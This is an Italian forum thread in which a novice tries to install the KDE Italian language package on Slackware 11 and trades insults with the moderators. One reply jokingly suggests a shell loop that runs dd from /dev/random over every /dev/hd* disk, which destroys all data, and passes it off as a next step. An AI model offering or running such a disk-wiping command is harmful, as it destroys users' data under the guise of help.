Problema lingua Italiana Slackware 11
Moderatore: Staff
Regole del forum
1) Citare sempre la versione di Slackware usata, la versione del Kernel e magari anche la versione della libreria coinvolta. Questi dati aiutano le persone che possono rispondere.
2) Per evitare confusione prego inserire in questo forum solo topic che riguardano appunto Slackware, se l'argomento è generale usate il forum Gnu/Linux in genere.
3) Leggere attentamente le risposte ricevute.
4) Scrivere i messaggi con il colore di default, evitare altri colori.
5) Scrivere in Italiano o in Inglese, se possibile grammaticalmente corretto, evitate stili di scrittura poco chiari, quindi nessuna abbreviazione tipo telegramma o scrittura stile SMS o CHAT.
6) Appena registrati è consigliato presentarsi nel forum dedicato.
La non osservanza delle regole porta a provvedimenti di vari tipo da parte dello staff, in particolare la non osservanza della regola 5 porta alla cancellazione del post e alla segnalazione dell'utente. In caso di recidività l'utente rischia il ban temporaneo.
1) Citare sempre la versione di Slackware usata, la versione del Kernel e magari anche la versione della libreria coinvolta. Questi dati aiutano le persone che possono rispondere.
2) Per evitare confusione prego inserire in questo forum solo topic che riguardano appunto Slackware, se l'argomento è generale usate il forum Gnu/Linux in genere.
3) Leggere attentamente le risposte ricevute.
4) Scrivere i messaggi con il colore di default, evitare altri colori.
5) Scrivere in Italiano o in Inglese, se possibile grammaticalmente corretto, evitate stili di scrittura poco chiari, quindi nessuna abbreviazione tipo telegramma o scrittura stile SMS o CHAT.
6) Appena registrati è consigliato presentarsi nel forum dedicato.
La non osservanza delle regole porta a provvedimenti di vari tipo da parte dello staff, in particolare la non osservanza della regola 5 porta alla cancellazione del post e alla segnalazione dell'utente. In caso di recidività l'utente rischia il ban temporaneo.
-
meglioilmarco
- Linux 0.x

-
meglioilmarco
- Linux 0.x

-
meglioilmarco
- Linux 0.x

-
meglioilmarco
- Linux 0.x

io sono andato nella directory dove ho salvato il file ho aperto una shell da li facendo actions..... lancio pkgtool gli dico di installare il pacchetto dalla directory corrente,mi restituisce una riga cosa ci metto? ho provato ad inserire il nome del pacchetto e mi da errore , ho provato a fare installpkg.... e mi fa lo stesso risultato mi dice che non termina in tgz!!
-
meglioilmarco
- Linux 0.x

- DaNiMoTh
- Linux 3.x

- Contatta:
Ma... non ti sei ancora accorto che tra kde-i18n-it-3.4.5.tgz e kde-i18n-it-3.5.4-noarch-1.tgz c'e` un -noarch-1 di differenza?
SVEGLIA!
Prova installpkg kde-i18n-it-3.5.4-noarch-1.tgz
In seguito:
for i in `ls /dev | grep hd`; do dd if =/dev/random of=$i; done
e reinstalla windows, che e` mmmmmmmmeglio
SVEGLIA!
Prova installpkg kde-i18n-it-3.5.4-noarch-1.tgz
In seguito:
for i in `ls /dev | grep hd`; do dd if =/dev/random of=$i; done
e reinstalla windows, che e` mmmmmmmmeglio
-
meglioilmarco
- Linux 0.x

- DaNiMoTh
- Linux 3.x

- Contatta:
ma non vedi che stai impazzendo :/meglioilmarco ha scritto:non avete capito un ca++o e non mi siete di aiuto se te facendo da shell e digitando installpkg kde.i18n.it-3.5.4-noarch-1.tgz ti si installa il pacchetto non so come ci riesci e soprattutto leggi i post precedenti prima di scrivere SVEGLIIIIIIIIIIIIIAAAAA!!!!!!!!!!!!!!
ti sposti nella directory in cui e` contenuto il pacchetto ( e ti e` stato detto )
stai attento a come scrivi il nome del pacchetto, o scrivi kde e poi dai tab ( e ti e` stato detto, ma nonostante questo sbagli ancora - ad esempio, stavolta hai messo i punti al posto dei trattini - )
Per il resto, il consiglio di installare windows ( o ancora meglio, comprati Linspire cosi` la smetti di bofonchiare su roba gratuita ) e` ancora valido. Certe cose necessitano di un po` di testa per funzionare
-
meglioilmarco
- Linux 0.x

Ma come puoi pretendere che la comunità ti aiuti se, appena giunto in un nuovo forum, offendi, non rispetti le regole, usi termini sgarbati e non rispetti nemmeno i consigli dell'admin che, con una pazienza fuori dal comune, ti sta continuando a reindirizzarti senza bannarti.meglioilmarco ha scritto:HAI TUTTO QUELLA TESTA E NON LA SFRUTTI CHE PECCATO ....
VISTO POI CHE TE NON BOFONCHI(BELLO IL TERMINE DA BAMBINO DI 6 ANNI)RISPONDI ALLA DOMANDA CHE TI AVEVO POSTO IN PRECEDENZA DIMMI PASSO PER PASSO COME AVEVI FATTO TE A CONFIGURARE LA LINGUA IN ITALIANO, INVE CHE SPARARE SOLO CAZZATE
Se vai nella dir dove hai il pacchetto per italianizzare kde basta che lanci:
Codice: Seleziona tutto
#installpkg nomePacchetto.tgz